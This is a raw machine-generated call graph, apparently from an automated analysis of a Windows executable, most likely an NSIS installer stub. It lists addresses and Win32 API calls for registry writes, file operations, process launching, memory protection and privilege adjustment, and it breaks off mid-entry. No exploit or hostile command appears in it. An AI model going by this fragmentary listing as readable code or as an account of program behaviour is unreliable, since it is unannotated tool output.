5378->5383 5384 4048b7 5379->5384 5385 404a12 5380->5385 5381->5370 5386 404984 CoTaskMemFree 5381->5386 5387 40435f 18 API calls 5382->5387 5384->5374 5388 405cbd 3 API calls 5384->5388 5427 4063e8 lstrcpynW 5385->5427 5389 405cbd 3 API calls 5386->5389 5390 4048eb 5387->5390 5388->5374 5391 404991 5389->5391 5425 404394 SendMessageW 5390->5425 5394 4049c8 SetDlgItemTextW 5391->5394 5399 40640a 17 API calls 5391->5399 5394->5370 5395 4048f1 5397 4067c2 5 API calls 5395->5397 5396 404a29 5398 4067c2 5 API calls 5396->5398 5397->5372 5400 404a30 5398->5400 5401 4049b0 lstrcmpiW 5399->5401 5402 404a71 5400->5402 5409 405d09 2 API calls 5400->5409 5411 404ac9 5400->5411 5401->5394 5404 4049c1 lstrcatW 5401->5404 5428 4063e8 lstrcpynW 5402->5428 5404->5394 5405 404a78 5406 405d68 4 API calls 5405->5406 5407 404a7e GetDiskFreeSpaceW 5406->5407 5410 404aa2 MulDiv 5407->5410 5407->5411 5409->5400 5410->5411 5412 404b3a 5411->5412 5413 404cd5 20 API calls 5411->5413 5414 404b5d 5412->5414 5415 40140b 2 API calls 5412->5415 5416 404b27 5413->5416 5429 404381 EnableWindow 5414->5429 5415->5414 5418 404b3c SetDlgItemTextW 5416->5418 5419 404b2c 5416->5419 5418->5412 5421 404c0c 20 API calls 5419->5421 5420 404b79 5420->5422 5430 4047a9 5420->5430 5421->5412 5422->5378 5424->5368 5425->5395 5426->5375 5427->5396 5428->5405 5429->5420 5431 4047b7 5430->5431 5432 4047bc SendMessageW 5430->5432 5431->5432 5432->5422 5433 401b53 5434 402c41 17 API calls 5433->5434 5435 401b5a 5434->5435 5436 402c1f 17 API calls 5435->5436 5437 401b63 wsprintfW 5436->5437 5438 402ac5 5437->5438 5439 401956 5440 402c41 17 API calls 5439->5440 5441 40195d lstrlenW 5440->5441 5442 402592 5441->5442 5450 4014d7 5451 402c1f 17 API calls 5450->5451 5452 4014dd Sleep 5451->5452 5454 402ac5 5452->5454 5455 401f58 5456 402c41 17 API calls 5455->5456 5457 401f5f 5456->5457 5458 40672b 2 API calls 5457->5458 5459 401f65 5458->5459 5461 401f76 5459->5461 5462 40632f wsprintfW 5459->5462 5462->5461 5463 402259 5464 402c41 17 API calls 5463->5464 5465 40225f 5464->5465 5466 402c41 17 API calls 5465->5466 5467 402268 5466->5467 5468 402c41 17 API calls 5467->5468 5469 402271 5468->5469 5470 40672b 2 API calls 5469->5470 5471 40227a 5470->5471 5472 40228b lstrlenW lstrlenW 5471->5472 5473 40227e 5471->5473 5474 405450 24 API calls 5472->5474 5475 405450 24 API calls 5473->5475 5476 4022c9 SHFileOperationW 5474->5476 5477 402286 5475->5477 5476->5473 5476->5477 5282 40175c 5283 402c41 17 API calls 5282->5283 5284 401763 5283->5284 5285 405f0d 2 API calls 5284->5285 5286 40176a 5285->5286 5287 405f0d 2 API calls 5286->5287 5287->5286 5478 401d5d GetDlgItem GetClientRect 5479 402c41 17 API calls 5478->5479 5480 401d8f LoadImageW SendMessageW 5479->5480 5481 401dad DeleteObject 5480->5481 5482 402ac5 5480->5482 5481->5482 5483 4022dd 5484 4022e4 5483->5484 5487 4022f7 5483->5487 5485 40640a 17 API calls 5484->5485 5486 4022f1 5485->5486 5488 405a4e MessageBoxIndirectW 5486->5488 5488->5487 5489 401563 5490 402a6b 5489->5490 5493 40632f wsprintfW 5490->5493 5492 402a70 5493->5492 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 402438 4449 402444 4445->4449 4459 402c1f 4445->4459 4446 40288b 4447 402c41 17 API calls 4450 40242e lstrlenW 4447->4450 4448 402463 RegSetValueExW 4453 402479 RegCloseKey 4448->4453 4449->4448 4462 4031d6 4449->4462 4450->4445 4453->4446 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4449 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 40329e 4467->4448 4468 405f61 ReadFile 4469 403221 4468->4469 4469->4467 4470 4032de 42 API calls 4469->4470 4471 403238 4470->4471 4471->4467 4472 4032a4 ReadFile 4471->4472 4474 403247 4471->4474 4472->4467 4474->4467 4475 405f61 ReadFile 4474->4475 4476 405f90 WriteFile 4474->4476 4475->4474 4476->4474 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4445 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4468 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4513 402ed5 4510->4513 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4513->4514 4515 402edd 4513->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5501 402868 5502 402c41 17 API calls 5501->5502 5503 40286f FindFirstFileW 5502->5503 5504 402882 5503->5504 5505 402897 5503->5505 5509 40632f wsprintfW 5505->5509 5507 4028a0 5510 4063e8 lstrcpynW 5507->5510 5509->5507 5510->5504 5511 401968 5512 402c1f 17 API calls 5511->5512 5513 40196f 5512->5513 5514 402c1f 17 API calls 5513->5514 5515 40197c 5514->5515 5516 402c41 17 API calls 5515->5516 5517 401993 lstrlenW 5516->5517 5518 4019a4 5517->5518 5519 4019e5 5518->5519 5523 4063e8 lstrcpynW 5518->5523 5521 4019d5 5521->5519 5522 4019da lstrlenW 5521->5522 5522->5519 5523->5521 5524 40166a 5525 402c41 17 API calls 5524->5525 5526 401670 5525->5526 5527 40672b 2 API calls 5526->5527 5528 401676 5527->5528 5529 755622fd 5530 75562367 5529->5530 5531 75562372 GlobalAlloc 5530->5531 5532 75562391 5530->5532 5531->5530 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 4017a9 5024 405cbd 3 API calls 5022->5024 5023 40179c 5026 40667c 5 API calls 5023->5026 5025 4017af lstrcatW 5024->5025 5025->5023 5037 4017bb 5026->5037 5027 40672b 2 API calls 5027->5037 5028 4017f7 5030 405eb9 2 API calls 5028->5030 5030->5037 5031 4017cd CompareFileTime 5031->5037 5032 40188d 5033 405450 24 API calls 5032->5033 5036 401897 5033->5036 5034 405450 24 API calls 5044 401879 5034->5044 5035 4063e8 lstrcpynW 5035->5037 5038 4031d6 44 API calls 5036->5038 5037->5027 5037->5028 5037->5031 5037->5032 5037->5035 5041 40640a 17 API calls 5037->5041 5051 405a4e MessageBoxIndirectW 5037->5051 5053 401864 5037->5053 5054 405ede GetFileAttributesW CreateFileW 5037->5054 5039 4018aa 5038->5039 5040 4018be SetFileTime 5039->5040 5042 4018d0 CloseHandle 5039->5042 5040->5042 5041->5037 5043 4018e1 5042->5043 5042->5044 5045 4018e6 5043->5045 5046 4018f9 5043->5046 5047 40640a 17 API calls 5045->5047 5048 40640a 17 API calls 5046->5048 5049 4018ee lstrcatW 5047->5049 5050 401901 5048->5050 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5037 5052->5044 5053->5034 5053->5044 5054->5037 5055->5023 5056->5022 5057 4027ef 5058 402a70 5057->5058 5059 4027f6 5057->5059 5060 402c1f 17 API calls 5059->5060 5061 4027fd 5060->5061 5062 40280c SetFilePointer 5061->5062 5062->5058 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5058 5533 401a72 5534 402c1f 17 API calls 5533->5534 5535 401a7b 5534->5535 5536 402c1f 17 API calls 5535->5536 5537 401a20 5536->5537 5538 406af2 5544 406976 5538->5544 5539 4072e1 5540 406a00 GlobalAlloc 5540->5539 5540->5544 5541 4069f7 GlobalFree 5541->5540 5542 406a77 GlobalAlloc 5542->5539 5542->5544 5543 406a6e GlobalFree 5543->5542 5544->5539 5544->5540 5544->5541 5544->5542 5544->5543 5545 401573 5546 401583 ShowWindow 5545->5546 5547 40158c 5545->5547 5546->5547 5548 40159a ShowWindow 5547->5548 5549 402ac5 5547->5549 5548->5549 5550 401cf3 5551 402c1f 17 API calls 5550->5551 5552 401cf9 IsWindow 5551->5552 5553 401a20 5552->5553 5554 402df3 5555 402e05 SetTimer 5554->5555 5556 402e1e 5554->5556 5555->5556 5557 402e6c 5556->5557 5558 402e72 MulDiv 5556->5558 5559 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5558->5559 5559->5557 5561 4014f5 SetForegroundWindow 5562 402ac5 5561->5562 5563 402576 5564 402c41 17 API calls 5563->5564 5565 40257d 5564->5565 5568 405ede GetFileAttributesW CreateFileW 5565->5568 5567 402589 5568->5567 5569 401b77 5570 401bc8 5569->5570 5572 401b84 5569->5572 5573 401bf2 GlobalAlloc 5570->5573 5574 401bcd 5570->5574 5571 401c0d 5576 40640a 17 API calls 5571->5576 5582 4022f7 5571->5582 5572->5571 5577 401b9b 5572->5577 5575 40640a 17 API calls 5573->5575 5574->5582 5590 4063e8 lstrcpynW 5574->5590 5575->5571 5578 4022f1 5576->5578 5588 4063e8 lstrcpynW 5577->5588 5584 405a4e MessageBoxIndirectW 5578->5584 5581 401bdf GlobalFree 5581->5582 5583 401baa 5589 4063e8 lstrcpynW 5583->5589 5584->5582 5586 401bb9 5591 4063e8 lstrcpynW 5586->5591 5588->5583 5589->5586 5590->5581 5591->5582 5592 755610e1 5601 75561111 5592->5601 5593 755611d8 GlobalFree 5594 755612ba 2 API calls 5594->5601 5595 755611d3 5595->5593 5596 75561272 2 API calls 5600 755611c4 GlobalFree 5596->5600 5597 75561164 GlobalAlloc 5597->5601 5598 755611f8 GlobalFree 5598->5601 5599 755612e1 lstrcpyW 5599->5601 5600->5601 5601->5593 5601->5594 5601->5595 5601->5596 5601->5597 5601->5598 5601->5599 5601->5600 5257 4024f8 5258 402c81 17 API calls 5257->5258 5259 402502 5258->5259 5260 402c1f 17 API calls 5259->5260 5261 40250b 5260->5261 5262 402533 RegEnumValueW 5261->5262 5263 402527 RegEnumKeyW 5261->5263 5266 40288b 5261->5266 5264 40254f RegCloseKey 5262->5264 5265 402548 5262->5265 5263->5264 5264->5266 5265->5264 5268 40167b 5269 402c41 17 API calls 5268->5269 5270 401682 5269->5270 5271 402c41 17 API calls 5270->5271 5272 40168b 5271->5272 5273 402c41 17 API calls 5272->5273 5274 401694 MoveFileW 5273->5274 5275 4016a7 5274->5275 5281 4016a0 5274->5281 5276 40672b 2 API calls 5275->5276 5278 402250 5275->5278 5279 4016b6 5276->5279 5277 401423 24 API calls 5277->5278 5279->5278 5280 4061ae 36 API calls 5279->5280 5280->5281 5281->5277 5602 7556166d 5603 75561516 GlobalFree 5602->5603 5605 75561685 5603->5605 5604 755616cb GlobalFree 5605->5604 5606 755616a0 5605->5606 5607 755616b7 VirtualFree 5605->5607 5606->5604 5607->5604 5615 401e7d 5616 402c41 17 API calls 5615->5616 5617 401e83 5616->5617 5618 402c41 17 API calls 5617->5618 5619 401e8c 5618->5619 5620 402c41 17 API calls 5619->5620 5621 401e95 5620->5621 5622 402c41 17 API calls 5621->5622 5623 401e9e 5622->5623 5624 401423 24 API calls 5623->5624 5625 401ea5 5624->5625 5632 405a14 ShellExecuteExW 5625->5632 5627 401ee7 5629 40288b 5627->5629 5633 406873 WaitForSingleObject 5627->5633 5630 401f01 CloseHandle 5630->5629 5632->5627 5634 40688d 5633->5634 5635 40689f GetExitCodeProcess 5634->5635 5636 4067fe 2 API calls 5634->5636 5635->5630 5637 406894 WaitForSingleObject 5636->5637 5637->5634 5638 4019ff 5639 402c41 17 API calls 5638->5639 5640 401a06 5639->5640 5641 402c41 17 API calls 5640->5641 5642 401a0f 5641->5642 5643 401a16 lstrcmpiW 5642->5643 5644 401a28 lstrcmpW 5642->5644 5645 401a1c 5643->5645 5644->5645 5646 401000 5647 401037 BeginPaint GetClientRect 5646->5647 5648 40100c DefWindowProcW 5646->5648 5650 4010f3 5647->5650 5651 401179 5648->5651 5652 401073 CreateBrushIndirect FillRect DeleteObject 5650->5652 5653 4010fc 5650->5653 5652->5650 5654 401102 CreateFontIndirectW 5653->5654 5655 401167 EndPaint 5653->5655 5654->5655 5656 401112 6 API calls 5654->5656 5655->5651 5656->5655 5657 401503 5658 40150b 5657->5658 5660 40151e 5657->5660 5659 402c1f 17 API calls 5658->5659 5659->5660 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4535 40288b 4531->4535 4533 4024c8 RegCloseKey 4532->4533 4534 4024c2 4532->4534 4533->4535 4534->4533 4543 40632f wsprintfW 4534->4543 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4533 5661 402104 5662 402c41 17 API calls 5661->5662 5663 40210b 5662->5663 5664 402c41 17 API calls 5663->5664 5665 402115 5664->5665 5666 402c41 17 API calls 5665->5666 5667 40211f 5666->5667 5668 402c41 17 API calls 5667->5668 5669 402129 5668->5669 5670 402c41 17 API calls 5669->5670 5672 402133 5670->5672 5671 402172 CoCreateInstance 5674 402191 5671->5674 5672->5671 5673 402c41 17 API calls 5672->5673 5673->5671 5675 401423 24 API calls 5674->5675 5676 402250 5674->5676 5675->5676 4544 75562993 4545 755629e3 4544->4545 4546 755629a3 VirtualProtect 4544->4546 4546->4545 4790 403e86 4791 403fd9 4790->4791 4792 403e9e 4790->4792 4793 40402a 4791->4793 4794 403fea GetDlgItem GetDlgItem 4791->4794 4792->4791 4795 403eaa 4792->4795 4799 404084 4793->4799 4807 401389 2 API calls 4793->4807 4798 40435f 18 API calls 4794->4798 4796 403eb5 SetWindowPos 4795->4796 4797 403ec8 4795->4797 4796->4797 4800 403ee5 4797->4800 4801 403ecd ShowWindow 4797->4801 4802 404014 SetClassLongW 4798->4802 4803 4043ab SendMessageW 4799->4803 4822 403fd4 4799->4822 4804 403f07 4800->4804 4805 403eed DestroyWindow 4800->4805 4801->4800 4806 40140b 2 API calls 4802->4806 4835 404096 4803->4835 4809 403f0c SetWindowLongW 4804->4809 4810 403f1d 4804->4810 4808 404309 4805->4808 4806->4793 4811 40405c 4807->4811 4817 404319 ShowWindow 4808->4817 4808->4822 4809->4822 4814 403fc6 4810->4814 4815 403f29 GetDlgItem 4810->4815 4811->4799 4816 404060 SendMessageW 4811->4816 4812 40140b 2 API calls 4812->4835 4813 4042ea DestroyWindow EndDialog 4813->4808 4871 4043c6 4814->4871 4818 403f59 4815->4818 4819 403f3c SendMessageW IsWindowEnabled 4815->4819 4816->4822 4817->4822 4823 403f66 4818->4823 4824 403f79 4818->4824 4825 403fad SendMessageW 4818->4825 4833 403f5e 4818->4833 4819->4818 4819->4822 4821 40640a 17 API calls 4821->4835 4823->4825 4823->4833 4827 403f81 4824->4827 4828 403f96 4824->4828 4825->4814 4830 40140b 2 API calls 4827->4830 4831 40140b 2 API calls 4828->4831 4829 403f94 4829->4814 4830->4833 4834 403f9d 4831->4834 4832 40435f 18 API calls 4832->4835 4868 404338 4833->4868 4834->4814 4834->4833 4835->4812 4835->4813 4835->4821 4835->4822 4835->4832 4852 40422a DestroyWindow 4835->4852 4862 40435f 4835->4862 4837 404111 GetDlgItem 4838 404126 4837->4838 4839 40412e ShowWindow KiUserCallbackDispatcher 4837->4839 4838->4839 4865 404381 EnableWindow 4839->4865 4841 404158 EnableWindow 4846 40416c 4841->4846 4842 404171 GetSystemMenu EnableMenuItem SendMessageW 4843 4041a1 SendMessageW 4842->4843 4842->4846 4843->4846 4845 403e67 18 API calls 4845->4846 4846->4842 4846->4845 4866 404394 SendMessageW 4846->4866 4867 4063e8 lstrcpynW 4846->4867 4848 4041d0 lstrlenW 4849 40640a 17 API calls 4848->4849 4850 4041e6 SetWindowTextW 4849->4850 4851 401389 2 API calls 4850->4851 4851->4835 4852->4808 4853 404244 CreateDialogParamW 4852->4853 4853->4808 4854 404277 4853->4854 4855 40435f 18 API calls 4854->4855 4856 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4855->4856 4857 401389 2 API calls 4856->4857 4858 4042c8 4857->4858 4858->4822 4859 4042d0 ShowWindow 4858->4859 4860 4043ab SendMessageW 4859->4860 4861 4042e8 4860->4861 4861->4808 4863 40640a 17 API calls 4862->4863 4864 40436a SetDlgItemTextW 4863->4864 4864->4837 4865->4841 4866->4846 4867->4848 4869 404345 SendMessageW 4868->4869 4870 40433f 4868->4870 4869->4829 4870->4869 4872 4043de GetWindowLongW 4871->4872 4873 404489 4871->4873 4872->4873 4874 4043f3 4872->4874 4873->4822 4874->4873 4875 404420 GetSysColor 4874->4875 4876 404423 4874->4876 4875->4876 4877 404433 SetBkMode 4876->4877 4878 404429 SetTextColor 4876->4878 4879 404451 4877->4879 4880 40444b GetSysColor 4877->4880 4878->4877 4881 404462 4879->4881 4882 404458 SetBkColor 4879->4882 4880->4879 4881->4873 4883 404475 DeleteObject 4881->4883 4884 40447c CreateBrushIndirect 4881->4884 4882->4881 4883->4884 4884->4873 5677 401f06 5678 402c41 17 API calls 5677->5678 5679 401f0c 5678->5679 5680 405450 24 API calls 5679->5680 5681 401f16 5680->5681 5682 4059d1 2 API calls 5681->5682 5683 401f1c 5682->5683 5684 401f3f CloseHandle 5683->5684 5686 406873 5 API calls 5683->5686 5687 40288b 5683->5687 5684->5687 5688 401f31 5686->5688 5688->5684 5690 40632f wsprintfW 5688->5690 5690->5684 5691 404809 5692 404819 5691->5692 5693 40483f 5691->5693 5695 40435f 18 API calls 5692->5695 5694 4043c6 8 API calls 5693->5694 5697 40484b 5694->5697 5696 404826 SetDlgItemTextW 5695->5696 5696->5693 5698 40190c 5699 401943 5698->5699 5700 402c41 17 API calls 5699->5700 5701 401948 5700->5701 5702 405afa 67 API calls 5701->5702 5703 401951 5702->5703 5704 40230c 5705 402314 5704->5705 5706 40231a 5704->5706 5708 402c41 17 API calls 5705->5708 5707 402328 5706->5707 5709 402c41 17 API calls 5706->5709 5710 402336 5707->5710 5711 402c41 17 API calls 5707->5711 5708->5706 5709->5707 5712 402c41 17 API calls 5710->5712 5711->5710 5713 40233f WritePrivateProfileStringW 5712->5713 5714 401f8c 5715 402c41 17 API calls 5714->5715 5716 401f93 5715->5716 5717 4067c2 5 API calls 5716->5717 5718 401fa2 5717->5718 5719 402026 5718->5719 5720 401fbe GlobalAlloc 5718->5720 5720->5719 5721 401fd2 5720->5721 5722 4067c2 5 API calls 5721->5722 5723 401fd9 5722->5723 5724 4067c2 5 API calls 5723->5724 5725 401fe3 5724->5725 5725->5719 5729 40632f wsprintfW 5725->5729 5727 402018 5730 40632f wsprintfW 5727->5730 5729->5727 5730->5719 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4990 402c41 17 API calls 4987->4990 4989 402c81 17 API calls 4988->4989 4991 40239d 4989->4991 4992 4023c8 4990->4992 4993 4023a7 4991->4993 4995 4023d5 4991->4995 4998 402cff 4992->4998 4996 402c41 17 API calls 4993->4996 4997 4023ae RegDeleteValueW RegCloseKey 4996->4997 4997->4995 4999 402d0c 4998->4999 5000 402d13 4998->5000 4999->4995 5000->4999 5002 402d44 5000->5002 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402dec 5004->5005 5010 402d76 5004->5010 5005->4999 5006 402d98 RegEnumKeyW 5007 402daf RegCloseKey 5006->5007 5006->5010 5008 4067c2 5 API calls 5007->5008 5011 402dbf 5008->5011 5009 402dd0 RegCloseKey 5009->5005 5010->5006 5010->5007 5010->5009 5012 402d44 6 API calls 5010->5012 5013 402de0 RegDeleteKeyW 5011->5013 5014 402dc3 5011->5014 5012->5010 5013->5005 5014->5005 5731 40190f 5732 402c41 17 API calls 5731->5732 5733 401916 5732->5733 5734 405a4e MessageBoxIndirectW 5733->5734 5735 40191f 5734->5735 5736 40558f 5737 4055b0 GetDlgItem GetDlgItem GetDlgItem 5736->5737 5738 405739 5736->5738 5781 404394 SendMessageW 5737->5781 5740 405742 GetDlgItem CreateThread CloseHandle 5738->5740 5741 40576a 5738->5741 5740->5741 5743 405795 5741->5743 5744 405781 ShowWindow ShowWindow 5741->5744 5745 4057ba 5741->5745 5742 405620 5747 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5742->5747 5746 4057f5 5743->5746 5749 4057a9 5743->5749 5750 4057cf ShowWindow 5743->5750 5783 404394 SendMessageW 5744->5783 5751 4043c6 8 API calls 5745->5751 5746->5745 5756 405803 SendMessageW 5746->5756 5754 405695 5747->5754 5755 405679 SendMessageW SendMessageW 5747->5755 5757 404338 SendMessageW 5749->5757 5752 4057e1 5750->5752 5753 4057ef 5750->5753 5758 4057c8 5751->5758 5759 405450 24 API calls 5752->5759 5760 404338 SendMessageW 5753->5760 5761 4056a8 5754->5761 5762 40569a SendMessageW 5754->5762 5755->5754 5756->5758 5763 40581c CreatePopupMenu 5756->5763 5757->5745 5759->5753 5760->5746 5765 40435f 18 API calls 5761->5765 5762->5761 5764 40640a 17 API calls 5763->5764 5766 40582c AppendMenuW 5764->5766 5767 4056b8 5765->5767 5768 405849 GetWindowRect 5766->5768 5769 40585c TrackPopupMenu 5766->5769 5770 4056c1 ShowWindow 5767->5770 5771 4056f5 GetDlgItem SendMessageW 5767->5771 5768->5769 5769->5758 5773 405877 5769->5773 5774 4056e4 5770->5774 5775 4056d7 ShowWindow 5770->5775 5771->5758 5772 40571c SendMessageW SendMessageW 5771->5772 5772->5758 5776 405893 SendMessageW 5773->5776 5782 404394 SendMessageW 5774->5782 5775->5774 5776->5776 5777 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5776->5777 5779 4058d5 SendMessageW 5777->5779 5779->5779 5780 4058fe GlobalUnlock SetClipboardData CloseClipboard 5779->5780 5780->5758 5781->5742 5782->5771 5783->5743 5784 401491 5785 405450 24 API calls 5784->5785 5786 401498 5785->5786 5794 401d14 5795 402c1f 17 API calls 5794->5795 5796 401d1b 5795->5796 5797 402c1f 17 API calls 5796->5797 5798 401d27 GetDlgItem 5797->5798 5799 402592 5798->5799 5800 404495 lstrcpynW lstrlenW 5801 75561000 5804 7556101b 5801->5804 5805 75561516 GlobalFree 5804->5805 5806 75561020 5805->5806 5807 75561027 GlobalAlloc 5806->5807 5808 75561024 5806->5808 5807->5808 5809 7556153d 3 API calls 5808->5809 5810 75561019 5809->5810 5811 403a96 5812 403aa1 5811->5812 5813 403aa5 5812->5813 5814 403aa8 GlobalAlloc 5812->5814 5814->5813 5815 402598 5816 4025c7 5815->5816 5817 4025ac 5815->5817 5818 4025fb 5816->5818 5819 4025cc 5816->5819 5820 402c1f 17 API calls 5817->5820 5822 402c41 17 API calls 5818->5822 5821 402c41 17 API calls 5819->5821 5825 4025b3 5820->5825 5823 4025d3 WideCharToMultiByte lstrlenA 5821->5823 5824 402602 lstrlenW 5822->5824 5823->5825 5824->5825 5826 402645 5825->5826 5828 405fbf 5 API calls 5825->5828 5829 40262f 5825->5829 5827 405f90 WriteFile 5827->5826 5828->5829 5829->5826 5829->5827 5830 40451e 5831 404536 5830->5831 5835 404650 5830->5835 5836 40435f 18 API calls 5831->5836 5832 4046ba 5833 404784 5832->5833 5834 4046c4 GetDlgItem 5832->5834 5841 4043c6 8 API calls 5833->5841 5837 404745 5834->5837 5838 4046de 5834->5838 5835->5832 5835->5833 5839 40468b GetDlgItem SendMessageW 5835->5839 5840 40459d 5836->5840 5837->5833 5846 404757 5837->5846 5838->5837 5845 404704 SendMessageW LoadCursorW SetCursor 5838->5845 5863 404381 EnableWindow 5839->5863 5843 40435f 18 API calls 5840->5843 5844 40477f 5841->5844 5850 4045aa CheckDlgButton 5843->5850 5864 4047cd 5845->5864 5847 40476d 5846->5847 5848 40475d SendMessageW 5846->5848 5847->5844 5852 404773 SendMessageW 5847->5852 5848->5847 5849 4046b5 5853 4047a9 SendMessageW 5849->5853 5861 404381 EnableWindow 5850->5861 5852->5844 5853->5832 5856 4045c8 GetDlgItem 5862 404394 SendMessageW 5856->5862 5858 4045de SendMessageW 5859 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5858->5859 5860 4045fb GetSysColor 5858->5860 5859->5844 5860->5859 5861->5856 5862->5858 5863->5849 5867 405a14 ShellExecuteExW 5864->5867 5866 404733 LoadCursorW SetCursor 5866->5837 5867->5866 5868 40149e 5869 4022f7 5868->5869 5870 4014ac PostQuitMessage 5868->5870 5870->5869 5871 401c1f 5872 402c1f 17 API calls 5871->5872 5873 401c26 5872->5873 5874 402c1f 17 API calls 5873->5874 5875 401c33 5874->5875 5876 401c48 5875->5876 5877 402c41 17 API calls 5875->5877 5878 402c41 17 API calls 5876->5878 5882 401c58 5876->5882 5877->5876 5878->5882 5879 401c63 5883 402c1f 17 API calls 5879->5883 5880 401caf 5881 402c41 17 API calls 5880->5881 5884 401cb4 5881->5884 5882->5879 5882->5880 5885 401c68 5883->5885 5886 402c41 17 API calls 5884->5886 5887 402c1f 17 API calls 5885->5887 5888 401cbd FindWindowExW 5886->5888 5889 401c74 5887->5889 5892 401cdf 5888->5892 5890 401c81 SendMessageTimeoutW 5889->5890 5891 401c9f SendMessageW 5889->5891 5890->5892 5891->5892 5893 402aa0 SendMessageW 5894 402ac5 5893->5894 5895 402aba InvalidateRect 5893->5895 5895->5894 5896 402821 5897 402827 5896->5897 5898 402ac5 5897->5898 5899 40282f FindClose 5897->5899 5899->5898 5900 4015a3 5901 402c41 17 API calls 5900->5901 5902 4015aa SetFileAttributesW 5901->5902 5903 4015bc 5902->5903 4547 4034a5 SetErrorMode GetVersion 4548 4034e4 4547->4548 4549 4034ea 4547->4549 4550 4067c2 5 API calls 4548->4550 4551 406752 3 API calls 4549->4551 4550->4549 4552 403500 lstrlenA 4551->4552 4552->4549 4553 403510 4552->4553 4554 4067c2 5 API calls 4553->4554 4555 403517 4554->4555 4556 4067c2 5 API calls 4555->4556 4557 40351e 4556->4557 4558 4067c2 5 API calls 4557->4558 4559 40352a #17 OleInitialize SHGetFileInfoW 4558->4559 4637 4063e8 lstrcpynW 4559->4637 4562 403576 GetCommandLineW 4638 4063e8 lstrcpynW 4562->4638 4564 403588 4565 405cea CharNextW 4564->4565 4566 4035ad CharNextW 4565->4566 4567 4036d7 GetTempPathW 4566->4567 4569 4035c6 4566->4569 4639 403474 4567->4639 4575 405cea CharNextW 4569->4575 4580 4036c0 4569->4580 4583 4036c2 4569->4583 4570 4036ef 4571 4036f3 GetWindowsDirectoryW lstrcatW 4570->4571 4572 403749 DeleteFileW 4570->4572 4574 403474 12 API calls 4571->4574 4649 402f30 GetTickCount GetModuleFileNameW 4572->4649 4576 40370f 4574->4576 4575->4569 4576->4572 4579 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4576->4579 4577 403810 4738 4039e6 4577->4738 4578 40375d 4578->4577 4581 403800 4578->4581 4585 405cea CharNextW 4578->4585 4584 403474 12 API calls 4579->4584 4580->4567 4679 403ad8 4581->4679 4735 4063e8 lstrcpynW 4583->4735 4589 403741 4584->4589 4602 40377c 4585->4602 4589->4572 4589->4577 4590 40394a 4592 403952 GetCurrentProcess OpenProcessToken 4590->4592 4593 4039ce ExitProcess 4590->4593 4591 40382a 4747 405a4e 4591->4747 4595 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4592->4595 4596 40399e 4592->4596 4595->4596 4601 4067c2 5 API calls 4596->4601 4598 403840 4604 4059b9 5 API calls 4598->4604 4599 4037da 4603 405dc5 18 API calls 4599->4603 4606 4039a5 4601->4606 4602->4598 4602->4599 4607 4037e6 4603->4607 4605 403845 lstrcatW 4604->4605 4608 403861 lstrcatW lstrcmpiW 4605->4608 4609 403856 lstrcatW 4605->4609 4610 4039ba ExitWindowsEx 4606->4610 4613 4039c7 4606->4613 4607->4577 4736 4063e8 lstrcpynW 4607->4736 4608->4577 4612 40387d 4608->4612 4609->4608 4610->4593 4610->4613 4615 403882 4612->4615 4616 403889 4612->4616 4617 40140b 2 API calls 4613->4617 4614 4037f5 4737 4063e8 lstrcpynW 4614->4737 4619 40591f 4 API calls 4615->4619 4620 40599c 2 API calls 4616->4620 4617->4593 4621 403887 4619->4621 4622 40388e SetCurrentDirectoryW 4620->4622 4621->4622 4623 4038a9 4622->4623 4624 40389e 4622->4624 4752 